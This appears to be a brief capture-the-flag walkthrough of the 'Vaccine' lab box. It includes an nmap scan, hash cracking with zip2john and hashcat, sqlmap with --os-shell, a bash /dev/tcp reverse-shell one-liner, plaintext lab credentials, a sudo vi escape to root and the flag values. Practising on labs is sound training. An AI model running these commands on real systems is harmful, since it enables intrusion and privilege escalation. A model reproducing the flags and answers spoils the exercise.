Initial Scan

sudo nmap -T4 -Pn -sV -sC -v -oA Vaccine

Task 1

Besides SSH and HTTP, what other service is hosted on this box?

Answer: FTP

Task 2

This service can be configured to allow login with any password for specific username. What is that username?

Answer: anonymous

Task 3

What is the name of the file downloaded over this service?



Task 4

What script comes with the John The Ripper toolset and generates a hash from a password protected zip archive in a format to allow for cracking attempts?

Answer: zip2john

Task 5

What is the password for the admin user on the website? password:41852963

Looking at index.html

Put the hash in a file and crack the hash with hashcat

hashcat -a 0 -m 0 hash /usr/share/wordlists/rockyou.txt


Task 6

What option can be passed to sqlmap to try to get command execution via the sql injection? Looking at sqlmap -h

Answer: --os-shell

Task 7

What program can the postgres user run as root using sudo?

Get the cookie from the Website.

sqlmap -u '' --cookie="PHPSESSID=n33tru7g83ed1hqdgfm42gnqic" --os-shell

We get our shell.

Start the listener and run

bash -c "bash -i >& /dev/tcp/ 0>&1"

Answer: vi

Task 8

Submit user flag

Answer: ec9b13ca4d6229cd5cc1e09980965bf7

Task 9

Submit root flag

Looking at files in the /var/www/html as there's this uses PHP. Looking in the dashboard.php file we see

user=postgres password=P@s5w0rd!

Looking at various options on GTBOBins

Open a file we could only do as sudo vi

type :shell=/bin/sh

Answer: dd6e058e814260bc70e9bbdef2715849

Last updated